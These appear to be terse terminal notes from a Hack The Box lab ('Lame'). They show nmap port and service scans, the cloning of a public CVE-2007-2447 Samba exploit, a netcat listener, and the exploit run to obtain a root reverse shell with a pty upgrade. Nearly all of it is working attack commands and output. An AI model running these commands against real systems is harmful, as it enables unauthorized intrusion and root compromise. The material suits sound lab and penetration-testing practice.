
nmap -p- --min-rate 1000 -T4 10.10.10.3                
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-29 18:41 -05
Nmap scan report for 10.10.10.3
Host is up (0.15s latency).
Not shown: 65530 filtered tcp ports (no-response)
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3632/tcp open  distccd

Nmap done: 1 IP address (1 host up) scanned in 122.66 seconds

**********************************************
nmap -p21,22,139,445,3632 -sCV -Pn -sS 10.10.10.3      
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-29 18:47 -05
Nmap scan report for 10.10.10.3
Host is up (0.13s latency).

PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.10.14.26
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 2h00m32s, deviation: 2h49m45s, median: 29s
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.20-Debian)
|   Computer name: lame
|   NetBIOS computer name: 
|   Domain name: hackthebox.gr
|   FQDN: lame.hackthebox.gr
|_  System time: 2025-05-29T19:48:02-04:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)


********************************************************
git clone https://github.com/xbufu/CVE-2007-2447.git

pip3 install pysmb
********************************************************
nc -lvnp 1234

python3 CVE-2007-2447.py --rhost 10.10.10.3 --rport 445 --lhost 10.10.14.26 --lport 1234
***********************************************************
nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.10.14.26] from (UNKNOWN) [10.10.10.3] 52003
sh: no job control in this shell
sh-3.2# whoami
root
sh-3.2# /bin/bash -i
bash: no job control in this shell
root@lame:/# python -c 'import pty; pty.spawn("/bin/bash")'
root@lame:/# whoami
whoami
root
****************************************************************
